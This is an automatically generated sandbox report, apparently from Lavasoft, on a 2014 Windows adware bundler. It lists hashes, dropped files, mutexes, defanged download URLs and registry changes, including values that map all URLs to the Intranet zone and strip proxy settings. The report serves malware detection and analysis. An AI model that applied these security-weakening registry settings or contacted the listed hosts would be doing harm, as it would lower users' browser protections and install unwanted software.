Application.Bundler.DomaIQ.Q_b50a979a4b

by malwarelabrobot on October 22nd, 2014 in Malware Descriptions.

Application.Bundler.DomaIQ.Q (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: b50a979a4b4a5df93e68ff718db1e70c
SHA1: 8dedd151e924fb8d4410f08168d4620ceede20b7
SHA256: df0cdd740ce1d68460f74983f7ae1c60bc3d853567427d76f9f91b672c0c5812
SSDeep: 6144:X K03nCYO3UiwGYKADe87J/UoRgiG aaQk3/7nra5W6eRPim01YZM:O3NOkiHoP/ZotaQW/7nryehi0M
Size: 322568 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-07-14 23:09:38
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Application creates the following process(es):

mscorsvw.exe:172
spidentifierimpl.exe:528
%original file name%.exe:940

The Application injects its code into the following process(es):

%original file name%.exe:1600

Mutexes

The following mutexes were created/opened:

ShimCacheMutex
RasPbFile
_!MSFTHISTORY!_
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!history!history.ie5!
WininetStartupMutex
WininetConnectionMutex
WininetProxyRegistryMutex
ZonesCounterMutex
ZonesCacheCounterMutex
ZonesLockedCacheCounterMutex

File activity

The process spidentifierimpl.exe:528 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\inetc.dll (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\SPtool.dll (180359 bytes)

The Application deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsnB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB7.tmp\SPtool.dll (0 bytes)

The process %original file name%.exe:1600 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\close.html (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\BingHP4info.dfe (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo3.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-img.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Browser app shoppinginfo.dfe (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\boton_xl.jpg (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-logo2.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\less.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\boton.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Genesisinfo.dfe (712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app.png (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\box.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\check-close.png (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9U0U7603\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\group.html (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\TheBestDeals\info.html (1323 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\finish.html (299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\45UV0H2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app_obv.jpg (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\mypcbackup.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\browserapp.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\style.css (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\BingHP4\info.html (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\mypcbackup.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\percentage-bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\jquery.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\spidentifierimpl.exe (89955 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2-gris.png (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPUB4PUN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-icon.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Genesis 2\info.html (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo2.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\butpause.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Genesis 2info.dfe (712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Browser appinfo.dfe (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\MyBackupPcinfo.dfe (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Browser app shopping\info.html (1251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\MyBackupPc\info.html (1106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WL2B4963\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\more.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress_small.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\vuupc.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1-small.png (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\options.html (965 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\genesis.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\templateDisplays.dfe (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2-gris-small.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\TheBestDealsinfo.dfe (750 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\instalando.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet-shortw.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3C.css (638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2C.css (578 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\templateStyle.dfe (4069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\exe\welcome.html (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\SpeedUpMyPcinfo.dfe (1215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-logo.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet-short.gif (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\logo-win.jpg (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\speedupmypc-img2.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\config.dmc (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\cross.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Wajaminfo.dfe (3326 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3D.css (539 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position2B.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Genesis\info.html (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Browser app\info.html (1497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bg_app.jpg (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\butplay.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position1A.css (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\binghp4.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1-gris.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position3A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Vuupcinfo.dfe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img1a.png (11 bytes)
%System%\wbem\Logs\wbemprox.log (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Wajam\info.html (3609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\Vuupc\info.html (1287 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\progress_small_bg.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\check.jpg (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\speedupmypc.css (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\wajam.css (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-img2.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\thebestdeals.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\bullet.gif (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\temp\Dockings.dfe (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\position4A.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\css\images\wajam-big.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin\SpeedUpMyPc\info.html (2953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\bin.dmc (4 bytes)

The process %original file name%.exe:940 makes changes in the file system.
The Application creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\be393027e81a4b88b52679c3751607ae.txt (7854 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswB5.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe (1431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe.config (767 bytes)

The Application deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nshB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\res.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswB5.tmp (0 bytes)

Registry activity

The process mscorsvw.exe:172 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process spidentifierimpl.exe:528 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 E5 0C FC 1D 29 82 20 C3 AB 42 A6 26 86 3B DE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Application modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Application modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Application modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Application deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1600 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a]
"spidentifierimpl.exe" = "Search Protect Identifier by conduit"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 4D 1D DD 7C FB 6F 67 B7 55 5E 0F 0F DC 8C A9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Application modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Application modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Application modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The process %original file name%.exe:940 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 77 5E CB EF 80 B6 5D 3D 9A 79 6E 11 FA 58 63"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 | File path
bcd32021c13b7e66581cbc1e44eff79b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\%original file name%.exe
484003524ef2000db83cb16ced0a48a1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\%original file name%.exe\e5d39da6f3e34d49a99c04aec898786a\spidentifierimpl.exe
1dadb63a5dfaa0679485c5dbaf96033f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nswB5.tmp\nsisdl.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5
.text | 4096 | 23148 | 23552 | 4.44633 | 1c619949741a76b63a54c1e6c4d6b2f8
.rdata | 28672 | 4558 | 4608 | 3.62955 | 6c31e0693072284f258d2c4a271de506
.data | 36864 | 110520 | 1024 | 3.36948 | 78f5760d9fafb71fdbc88c3497afef46
.ndata | 147456 | 61440 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e
.rsrc | 208896 | 17000 | 17408 | 3.5656 | 7fae611f3f73978e9992534a50a87055

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1391

URLs

hxxp://api.v2.sslsecure4.com/test.html 54.213.138.138
hxxp://api.v2.sslsecure4.com/index.php/api/85/Java/195/286/English.xml 54.213.138.138
hxxp://staticrr.paleokits.net//Displays/Softwares/c9c92824_display.html 85.12.5.27
hxxp://dl.newgenstatsnet.com/ba/full/mon/setup.exe 69.16.175.10
hxxp://files.uniblue.com/cm/softlate/speedupmypc/option9/setup/speedupmypc.exe 54.231.244.1
hxxp://staticrr.paleokits.net//Styles/Templates/d7d18a25_Win-Y.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Styles/Softwares/7a6c4a7c_genesis.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Styles/Softwares/82fb03ea_binghp4.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Displays/Softwares/4d947901_display.html 85.12.5.27
hxxp://track.v2.sslsecure4.com/test.html 54.201.5.113
hxxp://staticrr.paleokits.net//Styles/Softwares/db393704_vuupc.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Displays/Softwares/16220985_display.html 85.12.5.27
hxxp://staticrr.paleokits.net//Displays/Templates/8b4083bc_Win-Y-Yahoo.zip 85.12.5.27
hxxp://staticrr.paleokits.net//Dictionaries/English.xml 85.12.5.27
hxxp://aff-software.s3-website-us-east-1.amazonaws.com/7f1df2ad776e148c4007facb815b9b4a/Cloud_Backup_Setup.exe 205.251.242.131
hxxp://track.v2.sslsecure2.com/test.html 204.11.56.26
